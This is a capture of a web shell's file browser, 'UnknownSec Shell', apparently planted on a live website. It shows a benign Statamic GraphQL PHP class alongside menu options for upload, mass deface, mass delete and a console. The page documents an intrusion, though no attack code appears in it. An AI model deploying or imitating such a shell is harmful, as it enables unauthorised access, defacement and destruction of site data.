shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolas.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
GraphQL
/
Types
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
NavTreeBranchType.php
<?php namespace Statamic\GraphQL\Types; use Statamic\Facades\GraphQL; class NavTreeBranchType extends TreeBranchType { const NAME = 'NavTreeBranch'; public function fields(): array { return parent::fields() + [ 'page' => [ 'type' => GraphQL::type(PageInterface::NAME), ], ]; } }
© 2026 UnknownSec